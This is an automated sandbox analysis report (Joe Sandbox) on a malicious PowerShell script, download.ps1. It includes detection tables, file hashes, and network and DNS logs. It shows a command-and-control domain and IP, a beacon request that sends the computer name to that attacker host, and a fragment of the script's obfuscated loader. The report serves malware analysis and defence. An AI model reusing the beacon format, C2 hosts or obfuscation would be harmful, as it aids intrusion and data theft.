LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://kdemjgebjimkanl.top0%Avira URL Cloudsafe
http://crl.PP0%Avira URL Cloudsafe
http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?0%Avira URL Cloudsafe
http://www.google.com00%Avira URL Cloudsafe
http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=5270%Avira URL Cloudsafe
http://crl.~0%Avira URL Cloudsafe
http://crl.micr0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXzVs0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
kdemjgebjimkanl.top
45.61.136.138
truetrue
    unknown
    www.google.com
    142.250.217.196
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.PPpowershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000000.00000002.38540827413.000002085941D000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020859E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.000002085A19A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzVspowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?powershell.exe, 00000000.00000002.38540827413.0000020858D38000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://kdemjgebjimkanl.toppowershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.38540827413.0000020858B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B58000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.~powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.google.compowershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.quovadis.bm0powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/PesterXzVspowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.micrpowershell.exe, 00000000.00000002.38577476843.000002086FC40000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://pesterbdd.com/images/Pester.pngXzVspowershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.google.com0powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.217.196
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                45.61.136.138
                                                kdemjgebjimkanl.topUnited States
                                                40676AS40676UStrue
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1582507
                                                Start date and time:2024-12-30 19:18:51 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                Run name:Suspected VM Detection
                                                Number of analysed new started processes analysed:4
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:download.ps1
                                                Detection:MAL
                                                Classification:mal64.evad.winPS1@2/7@2/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 82%
                                                • Number of executed functions: 16
                                                • Number of non-executed functions: 4
                                                Cookbook Comments:
                                                • Found application associated with file extension: .ps1
                                                • Stop behavior analysis, all processes terminated
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                • Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • VT rate limit hit for: download.ps1
                                                TimeTypeDescription
                                                13:21:03API Interceptor32x Sleep call for process: powershell.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                • kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/u642xz31jvhtr.php?id=user-PC&key=84925345116&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/yfshl0dga3htr.php?id=user-PC&key=122775442322&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                kdemjgebjimkanl.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                • 107.176.168.227
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                download.ps1Get hashmaliciousUnknownBrowse
                                                • 45.61.136.138
                                                No context
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6222
                                                Entropy (8bit):3.758293285291377
                                                Encrypted:false
                                                SSDEEP:96:HeP4ECZZGWJOkvhkvCCtgTWybGx1pDHXRhTWybGxmpDHXRy:He3+aErbs1pjRJrbsmpjRy
                                                MD5:DD05E6C57FA6C34CFCBDA338D88571A3
                                                SHA1:3BBDB291CD80997A381355F1AE3CF8B99B675336
                                                SHA-256:008EAF3FEFFE58C8A42240AF8C533012CAFCD06D0A4106FF3F50E961ABFB8C33
                                                SHA-512:3010C4BD72FA81A45D0F2B315EEBF94DA48490FB65C8EE640E888202FA135AE264D6BC9166583F94F8DC3BDFC113234EC073BCD57FB02A218CFD514A0F53D042
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...;.}.S....&...Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...R..Z..ZN...Z......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y......B......................A!.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......"S.Y......D........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y......E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.b..Windows.@......"S.Y......F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.b....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.b....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y*Z....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y......i...........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6222
                                                Entropy (8bit):3.758293285291377
                                                Encrypted:false
                                                SSDEEP:96:HeP4ECZZGWJOkvhkvCCtgTWybGx1pDHXRhTWybGxmpDHXRy:He3+aErbs1pjRJrbsmpjRy
                                                MD5:DD05E6C57FA6C34CFCBDA338D88571A3
                                                SHA1:3BBDB291CD80997A381355F1AE3CF8B99B675336
                                                SHA-256:008EAF3FEFFE58C8A42240AF8C533012CAFCD06D0A4106FF3F50E961ABFB8C33
                                                SHA-512:3010C4BD72FA81A45D0F2B315EEBF94DA48490FB65C8EE640E888202FA135AE264D6BC9166583F94F8DC3BDFC113234EC073BCD57FB02A218CFD514A0F53D042
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...;.}.S....&...Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...R..Z..ZN...Z......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y......B......................A!.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......"S.Y......D........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y......E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.b..Windows.@......"S.Y......F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.b....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.b....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y*Z....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y......i...........
                                                File type:ASCII text, with very long lines (10831), with CRLF line terminators
                                                Entropy (8bit):5.967110225025242
                                                TrID:
                                                  File name:download.ps1
                                                  File size:20'393 bytes
                                                  MD5:237f43b9f810e6c6a16c22f7b13d3432
                                                  SHA1:819211cf07c4070f99e7cad5905a1e3f4865628e
                                                  SHA256:f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
                                                  SHA512:0cb243cffd7076ce72e540d87b223d1e99f212cd277c82b936b772952759d954645d772dfea35d510170c4ae10b084628f4ed6be71afa981a376bee5a1ed47e0
                                                  SSDEEP:384:Rzz93+7Mrc65BhyKQLCWl4nFcZJHyJojMnj25ZGHy61hKXRKobnlNh8FTXRpzft2:v3vo6Vy46SSHyK5ZzGh4RKorlNqFThP2
                                                  TLSH:92926CA7738CDDF282D996AF5213EC043BA9A42FC5ABAEC4FB4982C133916015E4DC50
                                                  File Content Preview:$vizlamghu=$executioncontext;$inonisesisalreesortionreisisinbeis = (-joIN (@((-7838+7891),(-6906+(-2195+(17502-(1174+(-415+(8235150/1085)))))),(245955/(-3778+8093)),(9419-(16751772/1788)),(428232/7647),(7520-(14488-7022)),(-7741+(16002-8205)),(-8968+9023)
                                                  Icon Hash:3270d6baae77db44
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-30T19:21:06.778691+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.204975645.61.136.13880TCP
                                                  2024-12-30T19:21:06.778691+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204975645.61.136.13880TCP
                                                  2024-12-30T19:21:07.503014+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.2049757142.250.217.19680TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 30, 2024 19:21:06.307483912 CET4975680192.168.11.2045.61.136.138
                                                  Dec 30, 2024 19:21:06.499749899 CET804975645.61.136.138192.168.11.20
                                                  Dec 30, 2024 19:21:06.500016928 CET4975680192.168.11.2045.61.136.138
                                                  Dec 30, 2024 19:21:06.503134012 CET4975680192.168.11.2045.61.136.138
                                                  Dec 30, 2024 19:21:06.695347071 CET804975645.61.136.138192.168.11.20
                                                  Dec 30, 2024 19:21:06.733535051 CET804975645.61.136.138192.168.11.20
                                                  Dec 30, 2024 19:21:06.778691053 CET4975680192.168.11.2045.61.136.138
                                                  Dec 30, 2024 19:21:06.869035006 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:06.997905970 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:06.998073101 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:06.998151064 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.127250910 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.502849102 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.502857924 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.503014088 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.504668951 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.633750916 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.647308111 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.647432089 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.647520065 CET8049757142.250.217.196192.168.11.20
                                                  Dec 30, 2024 19:21:07.647653103 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.700329065 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.762938976 CET4975780192.168.11.20142.250.217.196
                                                  Dec 30, 2024 19:21:07.763501883 CET4975680192.168.11.2045.61.136.138
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 30, 2024 19:21:05.620366096 CET6095053192.168.11.201.1.1.1
                                                  Dec 30, 2024 19:21:06.299253941 CET53609501.1.1.1192.168.11.20
                                                  Dec 30, 2024 19:21:06.736615896 CET6532653192.168.11.201.1.1.1
                                                  Dec 30, 2024 19:21:06.867253065 CET53653261.1.1.1192.168.11.20
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 30, 2024 19:21:05.620366096 CET192.168.11.201.1.1.10xaa93Standard query (0)kdemjgebjimkanl.topA (IP address)IN (0x0001)false
                                                  Dec 30, 2024 19:21:06.736615896 CET192.168.11.201.1.1.10x2460Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 30, 2024 19:21:06.299253941 CET1.1.1.1192.168.11.200xaa93No error (0)kdemjgebjimkanl.top45.61.136.138A (IP address)IN (0x0001)false
                                                  Dec 30, 2024 19:21:06.867253065 CET1.1.1.1192.168.11.200x2460No error (0)www.google.com142.250.217.196A (IP address)IN (0x0001)false
                                                  • kdemjgebjimkanl.top
                                                  • www.google.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.11.204975645.61.136.138807208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 30, 2024 19:21:06.503134012 CET215OUTGET /m0lf52z7dihtr.php?id=computer&key=66194449366&s=527 HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: kdemjgebjimkanl.top
                                                  Connection: Keep-Alive
                                                  Dec 30, 2024 19:21:06.733535051 CET166INHTTP/1.1 302 Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Mon, 30 Dec 2024 18:21:06 GMT
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Location: http://www.google.com


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.11.2049757142.250.217.196807208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 30, 2024 19:21:06.998151064 CET159OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: www.google.com
                                                  Connection: Keep-Alive
                                                  Dec 30, 2024 19:21:07.502849102 CET1289INHTTP/1.1 302 Found
                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0295X-gxgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                  x-hallmonitor-challenge: CgwIk8nLuwYQ3-PiuwESBGaBme4
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-hct8uYUc0GypzD8DEbu1MQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Date: Mon, 30 Dec 2024 18:21:07 GMT
                                                  Server: gws
                                                  Content-Length: 396
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Set-Cookie: AEC=AZ6Zc-VhMBfGgNs56bTT8NJetg2RoKoRSsJrUsaVnJajYmGV2lnLQd4sjio; expires=Sat, 28-Jun-2025 18:21:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                  Set-Cookie: NID=520=TgkzjJGMk0U9jKryB3VzYZaHGNbgU8MjeqgQIbEgInq8OROoPx_NYGVnnlRugPtpMciDo3Cb6-JTd2N7GpXDC6B0qnKZwIJOQD664y2uujOTQObld23nYXu7atksck_LCVWNwtflHkxPld4G86A0RRA9_OWveJfpamkyxIMspPrUIF2-3U7kApv6_6ZQXGG6DFsu; expires=Tue, 01-Jul-2025 18:21:07 GMT; path=/; domain=.google.com; HttpOnly
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/ht
                                                  Dec 30, 2024 19:21:07.502857924 CET336INData Raw: 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f
